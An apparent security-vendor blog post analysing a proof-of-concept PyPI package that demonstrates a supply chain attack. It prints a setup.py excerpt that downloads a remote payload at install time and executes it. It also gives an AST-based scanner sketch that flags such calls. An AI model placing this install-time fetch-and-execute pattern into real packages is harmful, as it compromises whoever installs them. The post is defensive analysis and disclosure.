'PoC' Python PyPI package demos supply chain attacks

Reported Jan 04, 2022 by Ashish Bijlani

PoC supply chain attack malicious

This package demonstrates what a malicious PyPI package could do to you :-)

10 Dec, 2020
PyPi Versions 5
Martin Vielsmaier
Deps 1

Our static analysis module flagged package i-am-malicious==1.0.5 as malicious. So we decided to take a deeper look at the code, particularly the statements that were flagged by our technology as "risky". Upon further review we found that the package is indeed fishy! Here we discuss our findings.

At Ossillate, we are building a large-scale security analysis platform to vet PyPI Python packages for software supply chain attacks. Our free CLI and CI/CD tools can help developers adopt pre-vetted third-party open-source packages and ship faster.

Our technology-generated report shows the use of the subprocess and urlopen APIs in setup.py. Because setup.py contains code that is executed immediately upon installation of a package, it is clear that the package is trying to communicate with a server during the installation process.



    with open("/tmp/malicious.py", "wb") as fp:
        ...  # line elided in this excerpt: writes the downloaded payload to fp
    subprocess.call(["python", "/tmp/malicious.py"])

Fig 1. setup.py downloads payload from a github repo and executes it during installation

Fig 1 above shows an excerpt from the setup.py file. As seen, it first downloads a supposedly malicious payload from a GitHub repo using the urlopen Python API. The payload is then saved as /tmp/malicious.py and executed using the subprocess API.
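The kind of check described above can be sketched with Python's `ast` module, which parses setup.py without running it. This is an added example, not Ossillate's analyzer or code from the package: the rule set, the function names and the sample input (with a placeholder URL) are assumptions made for illustration.

```python
import ast

# Assumed rule set for this example: calls worth a human look when found in setup.py.
RISKY_CALLS = {"subprocess.call", "subprocess.run", "subprocess.Popen", "os.system",
               "urllib.request.urlopen", "eval", "exec"}

# Constructed sample shaped like the excerpt; placeholder URL, parsed only, never executed.
SAMPLE_SETUP_PY = '''\
import subprocess
from urllib.request import urlopen
from setuptools import setup
payload = urlopen("https://example.invalid/payload.py").read()
with open("/tmp/malicious.py", "wb") as fp:
    fp.write(payload)
subprocess.call(["python", "/tmp/malicious.py"])
setup(name="constructed-sample", version="0.0.1")
'''

def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    return ".".join(reversed(parts + [node.id]))

def scan_setup_py(source):
    """Return sorted (line, qualified_api) pairs for risky calls, resolving import aliases."""
    tree = ast.parse(source)  # builds the syntax tree only; nothing is executed
    aliases = {}  # local name -> fully qualified name
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                top = a.name.split(".")[0]
                aliases[a.asname or top] = a.name if a.asname else top
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = node.module + "." + a.name
    findings = []
    for node in ast.walk(tree):
        name = dotted_name(node.func) if isinstance(node, ast.Call) else None
        if name:
            head = name.split(".")[0]
            full = aliases.get(head, head) + name[len(head):]
            if full in RISKY_CALLS:
                findings.append((node.lineno, full))
    return sorted(findings)
```

Calling `scan_setup_py(SAMPLE_SETUP_PY)` reports the `urlopen` call on line 4 and the `subprocess.call` on line 7 of the sample. A hit is a prompt for manual review rather than a verdict, since legitimate build scripts also call these APIs.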

We downloaded malicious.py manually from the GitHub repo. Fig 2 below shows its contents. While not malicious as of this writing, an attacker could change the contents of the malicious.py file in the repo at any time to something that is actually malicious. This definitely is a PoC attack to demonstrate how bad actors could carry out open-source software supply chain attacks.

    import datetime as dt

    with open("/tmp/malicious-was-here", "w") as fp:
        fp.write("I was here at {}".format(dt.datetime.now()))

We reported our findings to PyPI maintainers, and they have yanked this package.